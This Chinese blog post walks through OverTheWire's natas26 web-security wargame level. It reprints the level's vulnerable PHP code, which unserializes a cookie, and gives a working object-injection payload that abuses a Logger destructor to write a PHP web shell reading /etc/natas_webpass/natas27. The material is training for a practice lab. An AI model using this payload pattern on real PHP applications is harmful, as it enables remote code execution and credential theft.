natas26题解

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量612 收藏
点赞数
分类专栏: PHP natas 文章标签: PHP natas writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyover/article/details/50205745
版权
PHP 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
natas
1 篇文章 0 订阅
订阅专栏

这个题涉及到PHP的class对象注入

贴上题目源码

<?php
    // sry, this is ugly as hell.
    // cheers kaliman ;)
    // - morla
    
    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;
      
        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";
      
            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$initMsg);
            fclose($fd);
        }                       
      
        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }                       
      
        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }                       
    }
 
    function showImage($filename){
        if(file_exists($filename))
            echo "<img src=\"$filename\">";
    }

    function drawImage($filename){
        $img=imagecreatetruecolor(400,300);
        drawFromUserdata($img);
        imagepng($img,$filename);     
        imagedestroy($img);
    }
    
    function drawFromUserdata($img){
        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
        
            $color=imagecolorallocate($img,0xff,0x12,0x1c);
            imageline($img,$_GET["x1"], $_GET["y1"], 
                            $_GET["x2"], $_GET["y2"], $color);
        }
        
        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
            if($drawing)
                foreach($drawing as $object)
                    if( array_key_exists("x1", $object) && 
                        array_key_exists("y1", $object) &&
                        array_key_exists("x2", $object) && 
                        array_key_exists("y2", $object)){
                    
                        $color=imagecolorallocate($img,0xff,0x12,0x1c);
                        imageline($img,$object["x1"],$object["y1"],
                                $object["x2"] ,$object["y2"] ,$color);
            
                    }
        }    
    }
    
    function storeData(){
        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }
        
        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }
        
        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }
?>

<h1>natas26</h1>
<div id="content">

Draw a line:<br>
<form name="input" method="get">
X1<input type="text" name="x1" size=2>
Y1<input type="text" name="y1" size=2>
X2<input type="text" name="x2" size=2>
Y2<input type="text" name="y2" size=2>
<input type="submit" value="DRAW!">
</form> 

<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){  
        $imgfile="img/natas26_" . session_id() .".png"; 
        drawImage($imgfile); 
        showImage($imgfile);
        storeData();
    }
    
?>

这个题不好解,我都是看了几个答案才慢慢懂了(其实还是英文不好)

核心注入点在storeData()

我们把storeData里的$drawing附上我们加密的cookie 

class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;   
        function __construct(){
            $this->exitMsg="the answer is <? passthru('cat /etc/natas_webpass/natas27'); ?>\n\n";
            $this->logFile = "img/Hshell.php";
        } 
    }
$obj = new Logger();
echo base64_encode(serialize($obj));
这里输出我们加密的cookie,利用burpsuit或者其他代理改cookie后发送过去


这里有用的private只有两个
$logfile,$exitMsg
因为我们在将$drawing赋值为我们自己的程序里的同名的类Logger
在之后执行 $drawing[]=$new_object;
的时候因为类不是数组,出错,并且会执行析构函数


析构函数在做的是写入一个文件,我们就是靠这里来写入,之后访问 http://natas26.natas.labs.overthewire.org/img/Hshell.php就是答案

lyover
关注
专栏目录
natas(21-27)
半夜好饿的博客
08-19 469
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
170821 WarGames-Natas(26)
whklhhhh的博客
08-21 372
1625-5 王子昂 总结《2017年8月21日》 【连续第323天总结】 A. Natas26 B. 这次PHP脚本冗长,读下来也没看到什么漏洞 最后了解到unserialize()反序列化函数存在对象注入漏洞 正常的脚本中,serialize序列化函数可以将一个PHP对象转化成字符串,然后再通过unserialize反序列化函数将其还原,这样可以方便地编码对象来传递 但是这里存在
Natas Wargame Level26 Writeup(PHP对象注入)
a_18067的博客
05-24 201
源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $exitMsg; ...
natas(level26-level34)通关(三)
tempulcc的博客
10-13 449
@[TOC](natas(level26-level34)通关详细指南(三) level26 URL:http://natas26.natas.labs.overthewire.org Username: natas26 Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
网络空间安全——Wargame靶场(Natas)
weixin_44717952的博客
05-20 1337
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas15 题解
lyover的博客
11-25 948
natas一系列是国外的web安全游戏,可以真正的帮你练习web渗透,不单单是依靠工具,这次要写的就是一个sql盲注的脚本,下边附上第一关的网址 http://overthewire.org/wargames/natas/natas0.html 前几关还都好过,到了后边越来越难,写题解的大多都是外国,国内能的搜到只有很少,而且看了国内某巨巨用linux写的各种题解,云里雾里,只好跑到国外看
natas16 题解
lyover的博客
11-26 1074
本题与上一题相似(可看我上篇文章nata15 题解) 进入后发现和早前某关像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 $ . * 这三个,可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入 如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开
natas27题解(终章)
lyover的博客
12-08 1051
可以输入账号密码 先尝试用natas28登录,提示密码错误,也就是说,这个账号是写在数据库里的,并且密码就是我们想要的 // database gets cleared every 5 min 每五分钟重置数据库,如果一直提交natas28密码为空(或者随便,但是要写在post的参数里),恰好等到重置那个的时刻,库里就会有两个natas,在调用checkCredentials函数的时
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
Natas: OverTheWire 战争游戏及Natas解决方案详解》 在网络安全学习和实践领域,OverTheWire是一个颇受欢迎的在线平台,它提供了一系列的战争游戏,旨在帮助用户提升对网络安全技术的理解和应用能力。其中,...
OverTheWire-Natas
LJFYYJ的博客
07-23 903
natas前17关,待更新~
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名(例如,级别0的natas0)及其密码。 每个级别都可以访问下一个级别的密码。 您的工作是以某种方式获取下一个密码并进行升级。 所有密码也都存储在etcnatas_webpass中。 例如,natas5的密码存储在文件etcnatas_web
02-23
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
web安全Wargame—Natas解题思路(1-26)
xiaoi123的博客
08-29 1130
前言:   Natas是一个教授服务器端Web安全基础知识的 wargame,通过在每一关寻找Web安全漏洞,来获取通往下一关的秘钥,适合新手入门Web安全。 传送门~ 接下来给大家分享一下,1-20题的WriteUp。Natas0: 提示密码就在本页,右键查看源码,注释中发现key Key:gtVrDuiDfck831PqWsLEZy5gyDz1clto 知识点:查看页面源码 Na...
MATLAB实现NARX非线性自回归外生模型房价预测(含完整的程序和代码详解)
10-17
内容概要:本文详细介绍了如何使用MATLAB实现NARX非线性自回归外生模型进行房价预测。整个项目涵盖了数据准备、特征工程、模型构建、训练与预测以及GUI界面设计等环节。NARX模型通过结合历史房价数据和外生变量(如经济指标、地理位置等),提高了预测的准确性。项目的多指标评估包括均方误差(MSE)和决定系数(R²),并且设计了用户友好的GUI界面,方便用户自定义输入和展示预测结果。 适合人群:对时间序列预测感兴趣的数据分析师、研究人员及房地产从业人员。 使用场景及目标:适用于房地产市场分析、经济预测、财务决策支持等领域。主要目的是提高房价预测的准确性和可操作性。 其他说明:未来的研究方向包括纳入更多外生变量、优化模型超参数以及探索深度学习技术在房价预测中的应用。在实际应用时需要注意数据预处理和结果的合理解释与应用。
【精品毕设推荐】-基于微信小程序的网上商城系统设计与实现.zip
10-17
【项目简介】 可辅助在本地配置运行 网上商城的设计主要是对系统所要实现的功能进行详细考虑,确定所要实现的功能后进行界面的设计,在这中间还要考虑如何可以更好的将功能及页面进行很好的结合,方便用户可以很容易明了的找到自己所需要的信息,还有系统平台后期的可操作性,通过对信息内容的详细了解进行技术的开发。 网上商城平台开发使系统能够更加方便快捷,同时也促使网上商城变的更加系统化、有序化。 系统界面较友好,易于操作。具体在系统设计上,微信端使用微信开发者,后台也使用java技术在动态页面上进行了设计。 关键词:网上商城 ;微信开发者 java语言 Mysql 数据库 SSM框架
数学建模竞赛论文撰写指南-基于厦门地区联合研习活动的实践分享
10-17
内容概要:本文详细介绍了参加厦门地区数学建模联合研习活动所需撰写的论文参考框架,内容涵盖了论文的基本结构和每一部分的具体写作要点。从摘要、关键词、目录到各个章节的撰写要求,以及参考文献和附录的具体规范进行了全面指导,旨在帮助参赛队伍更加系统、科学地完成数学建模竞赛论文。 适合人群:即将参与厦门地区数学建模竞赛的学生及教师,尤其是初次接触数学建模的学生。 使用场景及目标:①作为参加数学建模比赛准备阶段的学习材料;②帮助参赛团队更好地理解和掌握数学建模论文的写作技巧与规范。 其他说明:文中强调了模型假设、模型建立与求解、模型检验、模型评价等多个环节的重要性,鼓励学生在实践中灵活运用,确保论文质量。同时,提供了参考文献的书写标准及具体案例,以便选手查阅并正确引用。
无人车定点控制-基于ROS平台实现差速移动机器人的NMPC控制C++源码.zip
10-17
无人车定点控制-基于ROS平台实现差速移动机器人的NMPC控制C++源码.zip
公司员工信息管理系统 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL.zip
10-17
公司员工信息管理系统 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL 系统启动教程:https://www.bilibili.com/video/BV11ktveuE2d
毕业设计论文SpringBoot校园体育场馆使用管理网站.docx
最新发布
10-17
毕业设计论文
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encodeString`,它是用来加密输入的字符串的。 3. 通过分析`encodeString`函数的代码,发现它是对输入的字符串进行了简单的替换和反转操作,最终得到了一个加密后的字符串。 4. 我们可以尝试对加密后的字符串进行反向操作,还原出原始的字符串。 5. 将得到的原始字符串作为参数,构造一个URL,然后访问这个URL,即可通过该关卡。 Level 12: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段PHP代码,其中包含了一个函数`echo base64_encode(strrev(xor_encrypt($data, $key)));`,它是用来加密输入的字符串的。 3. 通过分析`xor_encrypt`函数的代码,发现它是对输入的字符串进行了异或加密操作,并且加密的密钥是一个固定的字符串。 4. 我们可以尝试对加密后的字符串进行反向操作和异或解密操作,还原出原始的字符串。 5. 将得到的原始字符串作为参数,构造一个Cookie,然后将该Cookie发送给服务器,即可通过该关卡。注意,这里要修改的是Cookie,而不是URL。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值